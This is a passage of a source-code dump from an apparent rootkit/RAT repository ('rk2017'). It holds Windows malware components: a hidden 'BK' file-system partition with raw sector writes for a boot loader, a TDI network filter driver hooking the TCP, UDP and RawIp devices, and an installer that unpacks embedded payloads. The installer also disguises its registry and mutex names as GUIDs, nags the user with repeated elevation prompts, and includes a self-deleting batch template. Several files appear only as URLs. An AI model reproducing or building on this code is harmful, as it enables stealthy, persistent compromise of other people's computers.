}PARTITION_TABLE, *PPARTITION_TABLE; 31 | 32 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 33 | // BK file system area descriptor. 34 | typedef struct _BK_FS_AREA 35 | { 36 | PUNICODE_STRING pDeviceName; // Name of the device where BK FS partition located 37 | HANDLE hDevice; // Handle to the device 38 | ULONGLONG StartSector; // Start sector of the BK FS partition 39 | ULONG NumberOfSectors; // Number of sectors within BK FS partition 40 | ULONG BytesPerSector; // Bytes per sector 41 | ULONGLONG BootSector; // Boot sector of the active partition (containing initial loader) 42 | } BK_FS_AREA, *PBK_FS_AREA; 43 | 44 | 45 | // Minimum supportd FS size 46 | #define BK_FS_SIZE_MIN 2000 // sectors 47 | #define BK_FS_RESERVED_SECTORS 1 // number of FS reserved sectors 48 | #define BK_FS_NUMBER_FATS 1 // number of File allocation tables 49 | #define BK_FS_SECTORS_PER_ROOT 1 // initial Root directory size (sectors) 50 | #define BK_FS_BOOT_FILE_SIZE 102400 // size of BOOT.SYS file (the place for the loader) in bytes 51 | 52 | #pragma pack (push) 53 | #pragma pack(1) 54 | 55 | // BIOS Parameter block 56 | typedef struct _BPB 57 | { 58 | USHORT SectorSize; 59 | UCHAR SectorsPerCluster; 60 | USHORT RecervedSectors; 61 | UCHAR NumberOfFats; // for FAT only 62 | union 63 | { 64 | USHORT MaxRDEntries; // for FAT only 65 | USHORT FirstRDSector; // for VFAT 66 | }; 67 | USHORT SmallSectorsCount; // for FAT12/16 only 68 | UCHAR MediaDescriptorId; 69 | USHORT SectorsPerFat; // for FAT only 70 | USHORT SectorsPerTrack; 71 | USHORT NumberOfHeads; 72 | ULONG NumberOfHiddenSectors; 73 | ULONG FatTotalSectors; // for FAT only 74 | union { 75 | ULONG DriveNumber; 76 | ULONG RDSize; // for VFAT 77 | }; 78 | ULONGLONG VolumeTotalSectors; // NTFS only 79 | ULONGLONG MftStartingCluster; // NTFS only 80 | ULONGLONG MftMirrowCluster; // NTFS only 81 | LONG ClustersPerRecord; // NTFS only 82 | ULONG ClustersPerIndex; // NTFS only 83 | ULONGLONG VolumeSerialNumber; // NTFS only 84 | ULONG Checksum; 85 | } BPB, *PBPB; 86 | 87 | // Volume Boot Record 88 | typedef struct _VBR 89 | { 90 | CHAR JumpInstruction[3]; 91 | CHAR VolumeOemId[8]; 92 | BPB Bpb; 93 | } VBR,*PVBR; 94 | 95 | #pragma pack(pop) 96 | 97 | NTSTATUS _stdcall SectorIo(PUNICODE_STRING pUniDriveName, // drive name to read/write sectors from/to 98 | PCHAR pBuffer, // bufer to store the data 99 | ULONG ulLength, // size of the buffer 100 | ULONGLONG ulStartSector, // starting LBA sector 101 | ULONG ulCount, // number of sectors to read/write 102 | ULONG ulFlags); 103 | NTSTATUS _stdcall GetDriveGeometry(PUNICODE_STRING pUniDriveName,PVOID pDriveGeo); 104 | 105 | #define BkReadSectors(uDriveName,pBuffer,Length,StartSector,Count) \ 106 | SectorIo(uDriveName,pBuffer,Length,StartSector,Count,BK_IO_READ) 107 | 108 | #define BkWriteSectors(uDriveName,pBuffer,Length,StartSector,Count) \ 109 | SectorIo(uDriveName,pBuffer,Length,StartSector,Count,BK_IO_WRITE) 110 | 111 | #endif -------------------------------------------------------------------------------- /LdrK/Utils.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include "Utils.h" 3 | //#define NTSECAPI 4 | //#include 5 | 6 | ULONG UnicodeToAnsi(PWCHAR pSrc,PCHAR pDst,ULONG ulSize) 7 | { 8 | ULONG ulNeedSize; 9 | 10 | ulNeedSize = 0; 11 | if (ulSize) 12 | { 13 | ulNeedSize = WideCharToMultiByte(CP_ACP, \ 14 | NULL, \ 15 | pSrc, \ 16 | -1, \ 17 | pDst, \ 18 | ulSize, \ 19 | NULL, \ 20 | FALSE); 21 | } 22 | else 23 | { 24 | ulNeedSize = WideCharToMultiByte(CP_ACP, \ 25 | NULL, \ 26 | pSrc, \ 27 | -1, \ 28 | NULL, \ 29 | 0, \ 30 | NULL, \ 31 | FALSE); 32 | } 33 | return ulNeedSize; 34 | } 35 | ULONG AnsiToUnicode(PCHAR pSrc,PWCHAR pDst,ULONG ulSize) 36 | { 37 | ULONG ulNeedSize; 38 | 39 | ulNeedSize = 0; 40 | if (ulSize) 41 | { 42 | ulNeedSize = MultiByteToWideChar(CP_ACP, \ 43 | NULL, \ 44 | pSrc, \ 45 | -1, \ 46 | pDst, \ 47 | ulSize); 48 | } 49 | else 50 | { 51 | ulNeedSize = MultiByteToWideChar(CP_ACP, \ 52 | NULL, \ 53 | pSrc, \ 54 | -1, \ 55 | NULL, \ 56 | 0); 57 | } 58 | return ulNeedSize; 59 | } -------------------------------------------------------------------------------- /LdrK/Utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTILS_H__ 2 | #define __UTILS_H__ 3 | 4 | ULONG UnicodeToAnsi(PWCHAR pSrc,PCHAR pDst,ULONG ulSize); 5 | ULONG AnsiToUnicode(PCHAR pSrc,PWCHAR pDst,ULONG ulSize); 6 | 7 | #endif -------------------------------------------------------------------------------- /LdrK/copy.bat: -------------------------------------------------------------------------------- 1 | del C:\ShareDirectory\LdrK.exe 2 | copy C:\Rat\rk2017\Bin\Ldrk.exe C:\ShareDirectory\LdrK.exe /y -------------------------------------------------------------------------------- /LdrK/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/LdrK/stdafx.cpp -------------------------------------------------------------------------------- /LdrK/stdafx.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "targetver.h" 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib,"Ws2_32.lib") 11 | 12 | #include "../rk/IoCtlCode.h" 13 | #pragma warning(push) 14 | #pragma warning(disable:4005) 15 | #include "..\Inc\ntdll.h" 16 | #include 17 | #include "..\Inc\dbg.h" 18 | #pragma warning(pop) -------------------------------------------------------------------------------- /LdrK/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/LdrK/targetver.h -------------------------------------------------------------------------------- /TdiFlt/TdiFlt.c: -------------------------------------------------------------------------------- 1 | #include "TdiFlt.h" 2 | 3 | 4 | PDEVICE_OBJECT g_pTcpFltObj = NULL; 5 | PDEVICE_OBJECT g_pUdpFltObj = NULL; 6 | PDEVICE_OBJECT g_pRawIpFltObj = NULL; 7 | 8 | PDEVICE_OBJECT g_pTcpOldObj = NULL; 9 | PDEVICE_OBJECT g_pUdpOldObj = NULL; 10 | PDEVICE_OBJECT g_pRawIpOldObj = NULL; 11 | 12 | VOID DriverUnload(PDRIVER_OBJECT pDriverObject) 13 | { 14 | if (g_pTcpOldObj) 15 | { 16 | IoDetachDevice(g_pTcpOldObj); 17 | } 18 | if (g_pTcpFltObj) 19 | { 20 | IoDeleteDevice(g_pTcpFltObj); 21 | } 22 | 23 | if (g_pUdpOldObj) 24 | { 25 | IoDetachDevice(g_pUdpOldObj); 26 | } 27 | if (g_pUdpFltObj) 28 | { 29 | IoDeleteDevice(g_pUdpFltObj); 30 | } 31 | 32 | if (g_pRawIpOldObj) 33 | { 34 | IoDetachDevice(g_pRawIpOldObj); 35 | } 36 | if (g_pRawIpFltObj) 37 | { 38 | IoDeleteDevice(g_pRawIpFltObj); 39 | } 40 | } 41 | NTSTATUS AttachDeviceFromName(PDRIVER_OBJECT pDriverObject, \ 42 | PDEVICE_OBJECT *pFltObj, \ 43 | PDEVICE_OBJECT *pOldObj, \ 44 | PWCHAR pDevName) 45 | { 46 | NTSTATUS Status; 47 | UNICODE_STRING UniDevName; 48 | 49 | Status = IoCreateDevice(pDriverObject, \ 50 | 0, \ 51 | NULL, \ 52 | FILE_DEVICE_UNKNOWN, \ 53 | 0, \ 54 | TRUE, \ 55 | pFltObj); 56 | if (NT_ERROR(Status)) 57 | { 58 | return Status; 59 | } 60 | (*pFltObj)->Flags |= DO_DIRECT_IO; 61 | RtlInitUnicodeString(&UniDevName,pDevName); 62 | Status = IoAttachDevice(*pFltObj,&UniDevName,pOldObj); 63 | if (NT_ERROR(Status)) 64 | { 65 | if (*pFltObj) 66 | { 67 | IoDeleteDevice(*pFltObj); 68 | *pFltObj = NULL; 69 | } 70 | return Status; 71 | } 72 | return Status; 73 | } 74 | NTSTATUS DeviceDispatch(PDEVICE_OBJECT pDeviceObject,PIRP pIrp) 75 | { 76 | NTSTATUS Status; 77 | PIO_STACK_LOCATION pIrpStack; 78 | 79 | Status = STATUS_SUCCESS; 80 | 81 | pIrpStack = IoGetCurrentIrpStackLocation(pIrp); 82 | switch (pIrpStack->MajorFunction) 83 | { 84 | case IRP_MJ_CREATE: 85 | break; 86 | case IRP_MJ_DEVICE_CONTROL: 87 | break; 88 | case IRP_MJ_INTERNAL_DEVICE_CONTROL: 89 | break; 90 | case IRP_MJ_CLOSE: 91 | break; 92 | case IRP_MJ_CLEANUP: 93 | break; 94 | default: 95 | break; 96 | } 97 | return Status; 98 | } 99 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pUniRegister) 100 | { 101 | NTSTATUS Status; 102 | ULONG uli; 103 | 104 | Status = STATUS_SUCCESS; 105 | uli = 0; 106 | 107 | for (;uli < IRP_MJ_MAXIMUM_FUNCTION;uli++) 108 | { 109 | pDriverObject->MajorFunction[uli] = NULL; 110 | } 111 | do 112 | { 113 | Status = AttachDeviceFromName(pDriverObject,&g_pTcpFltObj,&g_pTcpOldObj,DEVICE_TCP_NAMEW); 114 | if (NT_ERROR(Status)) 115 | { 116 | break; 117 | } 118 | Status = AttachDeviceFromName(pDriverObject,&g_pUdpFltObj,&g_pUdpOldObj,DEVICE_UDP_NAMEW); 119 | if (NT_ERROR(Status)) 120 | { 121 | break; 122 | } 123 | Status = AttachDeviceFromName(pDriverObject,&g_pRawIpFltObj,&g_pRawIpOldObj,DEVICE_RAWIP_NAMEW); 124 | if (NT_ERROR(Status)) 125 | { 126 | break; 127 | } 128 | } while (0); 129 | if (NT_ERROR(Status)) 130 | { 131 | #ifdef _DEBUG 132 | DriverUnload(pDriverObject); 133 | #endif 134 | } 135 | return Status; 136 | } -------------------------------------------------------------------------------- /TdiFlt/TdiFlt.h: -------------------------------------------------------------------------------- 1 | #ifndef __TDIFLT_H__ 2 | #define __TDIFLT_H__ 3 | 4 | #include 5 | #include 6 | 7 | #define DEVICE_TCP_NAMEW L"\\Device\\Tcp" 8 | #define DEVICE_UDP_NAMEW L"\\Device\\Udp" 9 | #define DEVICE_RAWIP_NAMEW L"\\Device\\RawIp" 10 | 11 | extern PDEVICE_OBJECT g_pTcpFltObj; 12 | extern PDEVICE_OBJECT g_pUdpFltObj; 13 | extern PDEVICE_OBJECT g_pRawIpFltObj; 14 | 15 | extern PDEVICE_OBJECT g_pTcpOldObj; 16 | extern PDEVICE_OBJECT g_pUdpOldObj; 17 | extern PDEVICE_OBJECT g_pRawIpOldObj; 18 | 19 | NTSTATUS AttachDeviceFromName(PDRIVER_OBJECT pDriverObject, \ 20 | PDEVICE_OBJECT *pFltObj, \ 21 | PDEVICE_OBJECT *pOldObj, \ 22 | PWCHAR pDevName); 23 | 24 | NTSTATUS DeviceDispatch(PDEVICE_OBJECT pDeviceObject,PIRP pIrp); 25 | 26 | #endif -------------------------------------------------------------------------------- /TdiFlt/TdiFlt.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/TdiFlt/TdiFlt.vcproj -------------------------------------------------------------------------------- /TdiFlt/TdiFlt.vcproj.Seh_Cracker-PC.Seh_Cracker.user: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 11 | 35 | 36 | 39 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /Vfs/Guid.cpp: -------------------------------------------------------------------------------- 1 | #include "Vfs.h" 2 | #include "Time.h" 3 | #include "Guid.h" 4 | 5 | 6 | VOID GenGuid(GUID* pGuid,PULONG pSeed) 7 | { 8 | ULONG uli; 9 | pGuid->Data1 = MyRandom(pSeed); 10 | pGuid->Data2 = (USHORT)MyRandom(pSeed); 11 | pGuid->Data3 = (USHORT)MyRandom(pSeed); 12 | for (uli = 0;uli < 8;uli++) 13 | { 14 | pGuid->Data4[uli] = (UCHAR)MyRandom(pSeed); 15 | } 16 | } 17 | PWCHAR GuidName(PULONG pSeed,PWCHAR pPrefixW) 18 | { 19 | ULONG ulNameLen = GUID_STR_LEN + 1; 20 | PWCHAR pGuidStr,pName = NULL; 21 | GUID Guid; 22 | 23 | GenGuid(&Guid,pSeed); 24 | if (pGuidStr = GuidToString(&Guid)) 25 | { 26 | if (pPrefixW) 27 | { 28 | ulNameLen += wcslen(pPrefixW); 29 | } 30 | if (pName = (PWCHAR)AllocateMemory(ulNameLen * sizeof(WCHAR))) 31 | { 32 | pName[0] = 0; 33 | if (pPrefixW) 34 | { 35 | wcscpy(pName,pPrefixW); 36 | } 37 | wcscat(pName,pGuidStr); 38 | } 39 | FreeMemory(pGuidStr); 40 | } 41 | return pName; 42 | } 43 | PWCHAR GuidToString(GUID* pGuid) 44 | { 45 | PWCHAR pGuidStr = (PWCHAR)VfsAllocate((GUID_STR_LEN + 1) * sizeof(WCHAR)); 46 | if (pGuidStr) 47 | { 48 | wsprintf(pGuidStr, \ 49 | GUID_FORMAT, \ 50 | pGuid->Data1, \ 51 | pGuid->Data2, \ 52 | pGuid->Data3, \ 53 | *(USHORT*)&pGuid->Data4[0], \ 54 | *(ULONG*)&pGuid->Data4[2], \ 55 | *(USHORT*)&pGuid->Data4[6]); 56 | } 57 | return pGuidStr; 58 | } -------------------------------------------------------------------------------- /Vfs/Guid.h: -------------------------------------------------------------------------------- 1 | #ifndef __GUID_H__ 2 | #define __GUID_H__ 3 | 4 | 5 | 6 | 7 | VOID GenGuid(GUID* pGuid,PULONG pSeed); 8 | PWCHAR GuidToString(GUID* pGuid); 9 | PWCHAR GuidName(PULONG pSeed,PWCHAR pPrefixW); 10 | #endif -------------------------------------------------------------------------------- /Vfs/Setup.cpp: -------------------------------------------------------------------------------- 1 | #include "Vfs.h" 2 | #include "Guid.h" 3 | #include "../Inc/aplib.h" 4 | #include "Setup.h" 5 | 6 | BOOLEAN GetJoinedData(PIMAGE_DOS_HEADER LoaderBase,PCHAR* pBuffer,PULONG pSize,BOOLEAN bIs64Bit,ULONG ulNameHash,ULONG ulTypeFlags) 7 | { 8 | BOOLEAN bRet = FALSE; 9 | PIMAGE_NT_HEADERS pNtHeader; 10 | PIMAGE_SECTION_HEADER pSectionHeader; 11 | PADDON_DESCRIPTOR pAdDDesc; 12 | PCHAR pUnpacked; 13 | 14 | pNtHeader = (PIMAGE_NT_HEADERS)((PCHAR)LoaderBase + LoaderBase->e_lfanew); 15 | pSectionHeader = IMAGE_FIRST_SECTION(pNtHeader); 16 | pAdDDesc = (PADDON_DESCRIPTOR)(pSectionHeader + pNtHeader->FileHeader.NumberOfSections + 1); 17 | 18 | while (pAdDDesc->Magic != 0 && pAdDDesc->Magic != ADDON_MAGIC) 19 | { 20 | pAdDDesc += 1; 21 | } 22 | while (pAdDDesc->Magic == ADDON_MAGIC) 23 | { 24 | if ((!ulTypeFlags || (pAdDDesc->Flags & ulTypeFlags)) && (!ulNameHash || (pAdDDesc->ImageId == ulNameHash))) 25 | { 26 | if (((pAdDDesc->Flags & PE_FLAG_X64) && bIs64Bit) || (!(pAdDDesc->Flags & PE_FLAG_X64) && !bIs64Bit)) 27 | { 28 | if (pUnpacked = (PCHAR)AllocateMemory(pAdDDesc->ImageSize + 1)) 29 | { 30 | if (((pAdDDesc->Flags & TARGET_FLAG_PACKED) && \ 31 | (aP_depack((PCHAR)LoaderBase + pAdDDesc->ImageRva,pUnpacked) == pAdDDesc->ImageSize)) || \ 32 | (!(pAdDDesc->Flags & TARGET_FLAG_PACKED) && \ 33 | memcpy(pUnpacked,(PCHAR)LoaderBase + pAdDDesc->ImageRva, pAdDDesc->ImageSize))) 34 | { 35 | pUnpacked[pAdDDesc->ImageSize] = 0; 36 | *pBuffer = pUnpacked; 37 | *pSize = pAdDDesc->ImageSize; 38 | bRet = TRUE; 39 | break; 40 | } 41 | else 42 | { 43 | FreeMemory(pUnpacked); 44 | } 45 | } 46 | } 47 | } 48 | pAdDDesc = (PADDON_DESCRIPTOR)((PCHAR)pAdDDesc + pAdDDesc->NumberHashes * sizeof(ULONG)); 49 | pAdDDesc += 1; 50 | } 51 | return bRet; 52 | } 53 | BOOLEAN GetProgramKeyName(PWCHAR *pKeyNameW,PWCHAR *pMutexNameW) 54 | { 55 | BOOLEAN bRet; 56 | PWCHAR pRootDirectoryW; 57 | PWCHAR pSlashW; 58 | ULONG ulVolumeSerial; 59 | PWCHAR KeyNameW; 60 | PWCHAR MutexName; 61 | 62 | 63 | ulVolumeSerial = 0; 64 | pSlashW = NULL; 65 | pRootDirectoryW = NULL; 66 | bRet = FALSE; 67 | KeyNameW = NULL; 68 | MutexName = NULL; 69 | 70 | do 71 | { 72 | pRootDirectoryW = (PWCHAR)AllocateMemory(PAGE_SIZE); 73 | } while (NULL == pRootDirectoryW); 74 | RtlZeroMemory(pRootDirectoryW,PAGE_SIZE); 75 | if (GetWindowsDirectory(pRootDirectoryW,PAGE_SIZE)) 76 | { 77 | pSlashW = wcschr(pRootDirectoryW,L'\\'); 78 | if (pSlashW) 79 | { 80 | pSlashW[1] = 0; 81 | } 82 | if (GetVolumeInformation(pRootDirectoryW, \ 83 | NULL, \ 84 | 0, \ 85 | &ulVolumeSerial, \ 86 | NULL, \ 87 | NULL, \ 88 | NULL, \ 89 | 0)) 90 | { 91 | if ((KeyNameW = GuidName(&ulVolumeSerial,PROGRAMKEYNAME)) && (MutexName = GuidName(&ulVolumeSerial,LOCALNAME))) 92 | { 93 | *pKeyNameW = KeyNameW; 94 | *pMutexNameW = MutexName; 95 | bRet = TRUE; 96 | } 97 | } 98 | FreeMemory(pRootDirectoryW); 99 | } 100 | return bRet; 101 | } -------------------------------------------------------------------------------- /Vfs/Setup.h: -------------------------------------------------------------------------------- 1 | #ifndef __SETUP_H__ 2 | #define __SETUP_H__ 3 | #define ADDON_MAGIC 'JF' 4 | 5 | typedef struct _ADDON_DESCRIPTOR 6 | { 7 | USHORT Magic; // ADDON_MAGIC value 8 | USHORT NumberHashes; // number of name hashes in the Hash array 9 | ULONG ImageRva; // RVA of the packed image 10 | ULONG ImageSize; // size of the packed image 11 | ULONG ImageId; // any ID of the packed image (typicaly image name CRC32 hash) 12 | ULONG Flags; // addon flags 13 | ULONG Hash[0]; 14 | } ADDON_DESCRIPTOR, *PADDON_DESCRIPTOR; 15 | 16 | 17 | // Pe state and structure flags 18 | #define PE_FLAG_VALID 1 19 | #define PE_FLAG_NATIVE 2 20 | #define PE_FLAG_DLL 4 21 | #define PE_FLAG_X64 8 22 | #define PE_FLAG_CSUM 0x10 23 | 24 | #define TARGET_FLAG_BINARY 0x100 25 | #define TARGET_FLAG_DLL 0x200 26 | #define TARGET_FLAG_EXE 0x400 27 | #define TARGET_FLAG_DRV 0x800 28 | #define TARGET_FLAG_RUN 0x1000 29 | #define TARGET_FLAG_PACKED 0x2000 30 | 31 | 32 | _inline PADDON_DESCRIPTOR FirstAddonDescriptor(PVOID ImageBase) 33 | { 34 | PIMAGE_NT_HEADERS Pe = (PIMAGE_NT_HEADERS)((PCHAR)ImageBase + ((PIMAGE_DOS_HEADER)ImageBase)->e_lfanew); 35 | PIMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(Pe); 36 | 37 | return((PADDON_DESCRIPTOR)(Section + Pe->FileHeader.NumberOfSections + 1)); 38 | } 39 | 40 | #define NextAddonDescriptor(x) (PADDON_DESCRIPTOR)((PCHAR)x + sizeof(ADDON_DESCRIPTOR) + x->NumberHashes * sizeof(ULONG)) 41 | BOOLEAN GetProgramKeyName(PWCHAR *pKeyNameW,PWCHAR *pMutexNameW); 42 | 43 | #endif -------------------------------------------------------------------------------- /Vfs/Time.cpp: -------------------------------------------------------------------------------- 1 | #include "Vfs.h" 2 | #include "Time.h" 3 | 4 | ULONG GetSystemTimeStamp(VOID) 5 | { 6 | LARGE_INTEGER Frequency; 7 | LARGE_INTEGER SystemTime; 8 | LARGE_INTEGER TickCount; 9 | ULONGLONG SecElapsed,SecStarted; 10 | 11 | QueryPerformanceFrequency(&Frequency); 12 | QueryPerformanceCounter(&TickCount); 13 | GetSystemTimeAsFileTime((LPFILETIME)&SystemTime); 14 | 15 | // Calculating number of seconds elapsed since the system started 16 | SecElapsed = (ULONGLONG)TickCount.QuadPart / (ULONGLONG)Frequency.QuadPart; 17 | 18 | // Calculating number of seconds elapsed since January 1, 1601 (UTC) before the system started 19 | SecStarted = (ULONGLONG)SystemTime.QuadPart / 10000000 - SecElapsed; 20 | 21 | // Calculating number of 3-day intervals elapsed since January 1, 1601 (UTC) before the system started 22 | SecStarted /= (3600 * 24 * 3); 23 | 24 | return((ULONG)(SecStarted)); 25 | } 26 | ULONG MyRandom(PULONG pSeed) 27 | { 28 | return(*pSeed = 1664525 * (*pSeed) + 1013904223); 29 | } -------------------------------------------------------------------------------- /Vfs/Time.h: -------------------------------------------------------------------------------- 1 | #ifndef __TIME_H__ 2 | #define __TIME_H__ 3 | 4 | ULONG GetSystemTimeStamp(VOID); 5 | ULONG MyRandom(PULONG pSeed); 6 | 7 | #endif -------------------------------------------------------------------------------- /Vfs/UAC.cpp: -------------------------------------------------------------------------------- 1 | #include "Vfs.h" 2 | #include "UAC.h" 3 | 4 | VOID RequestUac(VOID) 5 | { 6 | PWCHAR pModulePathW; 7 | SHELLEXECUTEINFOW ExecInfoW = {0}; 8 | 9 | if (pModulePathW = (PWCHAR)AllocateMemory(PAGE_SIZE)) 10 | { 11 | if (GetModuleFileName(NULL,pModulePathW,0x1000)) 12 | { 13 | CoInitializeEx(NULL,COINIT_APARTMENTTHREADED); 14 | 15 | ExecInfoW.cbSize = sizeof(SHELLEXECUTEINFO); 16 | ExecInfoW.lpVerb = RUNAS; 17 | ExecInfoW.lpFile = pModulePathW; 18 | 19 | while(!ShellExecuteEx(&ExecInfoW)); 20 | } 21 | FreeMemory(pModulePathW); 22 | } 23 | } -------------------------------------------------------------------------------- /Vfs/UAC.h: -------------------------------------------------------------------------------- 1 | #ifndef __UAC_H__ 2 | #define __UAC_H__ 3 | 4 | VOID RequestUac(VOID); 5 | 6 | #endif -------------------------------------------------------------------------------- /Vfs/Vfs.cpp: -------------------------------------------------------------------------------- 1 | #include "Vfs.h" 2 | #include "Guid.h" 3 | #include "Setup.h" 4 | #include "UAC.h" 5 | #include "Time.h" 6 | 7 | 8 | 9 | HANDLE g_VfsHandle = NULL; 10 | PWCHAR g_VfsRootName = NULL; 11 | 12 | 13 | PVOID AllocateMemory(ULONG ulSize) 14 | { 15 | return VirtualAlloc(NULL,ulSize,MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE); 16 | } 17 | BOOLEAN FreeMemory(PVOID pFreeMemory) 18 | { 19 | return VirtualFree(pFreeMemory,0,MEM_RELEASE); 20 | } 21 | PWCHAR GenFsDeviceName() 22 | { 23 | ULONG ulSystemTimeStamp; 24 | PWCHAR pGuidName; 25 | PWCHAR pDeviceName; 26 | GUID Guid; 27 | 28 | pDeviceName = NULL; 29 | pGuidName = NULL; 30 | ulSystemTimeStamp = 0; 31 | 32 | ulSystemTimeStamp = GetSystemTimeStamp(); 33 | GenGuid(&Guid,&ulSystemTimeStamp); 34 | if (pGuidName = GuidToString(&Guid)) 35 | { 36 | if (pDeviceName = (PWCHAR)VfsAllocate((wcslen(VFS_ROOT_FORMAT) + GUID_STR_LEN + 1) * sizeof(WCHAR))) 37 | { 38 | wsprintf(pDeviceName,VFS_ROOT_FORMAT,pGuidName); 39 | } 40 | else 41 | { 42 | VfsFree((PCHAR)pGuidName); 43 | } 44 | } 45 | return pDeviceName; 46 | } 47 | BOOLEAN VfsCreateDevice() 48 | { 49 | BOOLEAN bRet = FALSE; 50 | HANDLE hFile; 51 | 52 | hFile = CreateFile(g_VfsRootName, \ 53 | GENERIC_READ | GENERIC_WRITE, \ 54 | FILE_SHARE_READ | FILE_SHARE_WRITE, \ 55 | NULL, OPEN_ALWAYS, \ 56 | FILE_ATTRIBUTE_DIRECTORY, \ 57 | 0); 58 | if (hFile != INVALID_HANDLE_VALUE) 59 | { 60 | CloseHandle(hFile); 61 | bRet = TRUE; 62 | } 63 | return bRet; 64 | } 65 | PCHAR VfsAllocate(ULONG ulSize) 66 | { 67 | HANDLE hCurHeap = NULL; 68 | PCHAR pRetBuf = NULL; 69 | 70 | hCurHeap = GetProcessHeap(); 71 | if (NULL == hCurHeap) 72 | { 73 | return NULL; 74 | } 75 | pRetBuf = (PCHAR)HeapAlloc(hCurHeap,HEAP_ZERO_MEMORY,ulSize); 76 | if (NULL == pRetBuf) 77 | { 78 | return NULL; 79 | } 80 | return pRetBuf; 81 | } 82 | BOOLEAN VfsFree(PCHAR pFreeBuf) 83 | { 84 | HANDLE hCurHeap = NULL; 85 | BOOLEAN bRet = FALSE; 86 | 87 | hCurHeap = GetProcessHeap(); 88 | if (NULL == hCurHeap) 89 | { 90 | return FALSE; 91 | } 92 | bRet = HeapFree(hCurHeap,HEAP_ZERO_MEMORY,pFreeBuf); 93 | if (bRet == FALSE) 94 | { 95 | return FALSE; 96 | } 97 | return TRUE; 98 | } 99 | #ifndef VFS_ENTRY 100 | int main(ULONG ulArgc, PCHAR pArgv[]) 101 | { 102 | PWCHAR pKeyNameW,pMutexNameW; 103 | ULONG ulStatus; 104 | HKEY hKey; 105 | HANDLE hMutex; 106 | ULONG ulOsVersion; 107 | BYTE bVersionHigh,bVersionLow; 108 | BOOLEAN bElevated; 109 | 110 | pKeyNameW = NULL; 111 | pMutexNameW = NULL; 112 | hMutex = NULL; 113 | ulOsVersion = 0; 114 | bElevated = TRUE; 115 | 116 | do 117 | { 118 | if (!GetProgramKeyName(&pKeyNameW,&pMutexNameW)) 119 | { 120 | ulStatus = ERROR_NOT_ENOUGH_MEMORY; 121 | break; 122 | } 123 | if (!(hMutex = CreateMutex(NULL,TRUE,pMutexNameW)) || ((ulStatus = GetLastError()) == ERROR_ALREADY_EXISTS)) 124 | { 125 | ulStatus = ERROR_SERVICE_ALREADY_RUNNING; 126 | break; 127 | } 128 | if (RegOpenKey(HKEY_LOCAL_MACHINE,pKeyNameW,&hKey) == NO_ERROR) 129 | { 130 | RegCloseKey(hKey); 131 | ulStatus = ERROR_ALREADY_EXISTS; 132 | break; 133 | } 134 | ulOsVersion = GetVersion(); 135 | bVersionHigh = LOBYTE(LOWORD(ulOsVersion)); 136 | bVersionLow = HIBYTE(LOWORD(ulOsVersion)); 137 | 138 | // Checking if current OS supported 139 | if ((bVersionHigh == 5 && bVersionLow == 0) || bVersionHigh < 5 || bVersionHigh > 6) 140 | { 141 | ulStatus = ERROR_OLD_WIN_VERSION; 142 | break; 143 | } 144 | // Running as separate executable 145 | if (bVersionHigh == 6) 146 | { 147 | // For Vista and higher: 148 | // Checking for UAC elevated token 149 | HANDLE hToken; 150 | ULONG ulSize; 151 | 152 | bElevated = FALSE; 153 | if (OpenProcessToken(GetCurrentProcess(),READ_CONTROL | TOKEN_QUERY,&hToken)) 154 | { 155 | GetTokenInformation(hToken,(TOKEN_INFORMATION_CLASS)20,&bElevated,sizeof(BOOLEAN),&ulSize); 156 | CloseHandle(hToken); 157 | } 158 | } 159 | if (!bElevated) 160 | { 161 | CloseHandle(hMutex); 162 | hMutex = 0; 163 | RequestUac(); 164 | ulStatus = ERROR_ACCESS_DENIED; 165 | break; 166 | } 167 | 168 | } while (0); 169 | } 170 | #else 171 | int main(ULONG ulArgc, PCHAR pArgv[]) 172 | { 173 | BOOLEAN bRet = FALSE; 174 | 175 | if (g_VfsRootName = GenFsDeviceName()) 176 | { 177 | bRet = VfsCreateDevice(); 178 | } 179 | 180 | return 0; 181 | } 182 | #endif 183 | 184 | 185 | -------------------------------------------------------------------------------- /Vfs/Vfs.h: -------------------------------------------------------------------------------- 1 | #ifndef __VFS_H__ 2 | #define __VFS_H__ 3 | 4 | #include 5 | 6 | #define PAGE_SIZE 0x1000 7 | 8 | 9 | #define DOS_NAME_LEN 8+1+3+1 // 8.3 name size in chars with 0 10 | #define tczOpen _T("open") 11 | #define RUNAS L"runas" 12 | #define tczBkSlash _T("\\") 13 | #define tczBatFmt _T("%lu.bat") 14 | #define tczBatchFile _T("attrib -r -s -h%%1\r\n:%u\r\ndel %%1\r\nif exist %%1 goto %u\r\ndel %%0\r\n") 15 | #define szKernel32 "KERNEL32.DLL" 16 | 17 | #define GUID_STR_LEN 16 * 2 + 4 + 2 // length of the GUID string in chars 18 | #define GUID_FORMAT L"{%08X-%04X-%04X-%04X-%08X%04X}" 19 | #define VFS_ROOT_FORMAT L"\\\\.\\%s\\" 20 | #define PROGRAMKEYNAME L"Software\\Classes\\CLSID\\" 21 | #define LOCALNAME L"Local\\" 22 | 23 | 24 | extern HANDLE g_VfsHandle; 25 | extern PWCHAR g_VfsRootName; 26 | 27 | 28 | BOOLEAN VfsFree(PCHAR pFreeBuf); 29 | PCHAR VfsAllocate(ULONG ulSize); 30 | PWCHAR GenFsDeviceName(); 31 | BOOLEAN VfsCreateDevice(); 32 | BOOLEAN FreeMemory(PVOID pFreeMemory); 33 | PVOID AllocateMemory(ULONG ulSize); 34 | 35 | #endif -------------------------------------------------------------------------------- /Vfs/Vfs.vcproj: -------------------------------------------------------------------------------- 